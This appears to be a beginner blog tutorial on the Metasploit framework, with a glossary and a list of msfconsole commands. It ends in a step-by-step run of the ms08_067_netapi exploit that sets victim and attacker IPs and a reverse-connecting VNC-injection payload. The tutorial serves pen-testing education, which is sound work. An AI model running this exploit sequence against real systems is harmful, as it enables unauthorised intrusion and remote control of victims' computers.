Pen testing software metasploit. Metasploit framework it is an open source software for penetration testing. Which is used for developing and executing exploit code against a remote target system.
Penetration testing world for hackers if you are new to penetration testing then we’d certainly recommends metasploit framework. Metasploit is a framework and it is not a specific application it means the users of metasploit can create their own exploits for testing the systems loop holes. Metasploit Version’s Metasploit released several versions of metasploit both freeware and Premium. But for new learners the free version works just great.
Framework is available for both windows and Linux but we recommend that you to learn it in any Linux distro or any Linux environment. The premium version of metasploit framework is of $5,000. The pro version is aimed at the professional pen tester. By the Way the cost $5,000 is price per year per user. If you are using Metasploit Framework you must understand these terms:
- System exploitation :- You are trying to exploit a vulnerability in a system, machine or any network.
- Payload :- It is the actual code which runs on the target system after exploitation.
- Listening :- Listening to incoming connections.
- Vulnerability :- Loop hole which is used to break or compromise a system’s security.
- Exploit :- These are the codes which allows any pen tester to take advantage of a vulnerable system.
Some commands of Metasploit Framework Pen Testing
For starting of metasploit type msfconsole on your terminal. It is also available for GUI mode or Graphical user interface for this type msfgui on your terminal.
For Help type msfconsole –h (it gives the basic idea about the usage of metasploit)
For msfconsole help just type help
Connect command it is the alternative of telnet and ncat in metasploit.
Connect –s www.metasploit.com 443
Ping Command :- ping 92.168.xxx.xxx
Show exploit command :- show exploits
Show payloads command :- show payloads
Info command :- info <exploit> or info <payload>
Use command :- use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options To show available options
msf exploit(ms08_067_netapi) > set rhost 22.214.171.124 → To set remote IP (victim IP) msf exploit(ms08_067_netapi) > set lhost 192.168.1.45 → To set local IP (attacker IP) msf exploit(ms08_067_netapi) > set rport 445 → To set port number of remote host
msf exploit(ms08_067_netapi) > set lport 443 → To set port number of local host
msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp_dns → Tp set payload
msf exploit(ms08_067_netapi) > unset rhost → To remove rhost
msf exploit(ms08_067_netapi) > unset lhost → To remove local host
msf exploit(ms08_067_netapi) > exploit → To execute exploit
msf exploit(ms08_067_netapi) > back → To go back on the main window
msf exploit(ms08_067_netapi) > sessions -l → To check any active session
msf exploit(ms08_067_netapi) > sessions -i ID → To go on a active session ID must be numeric number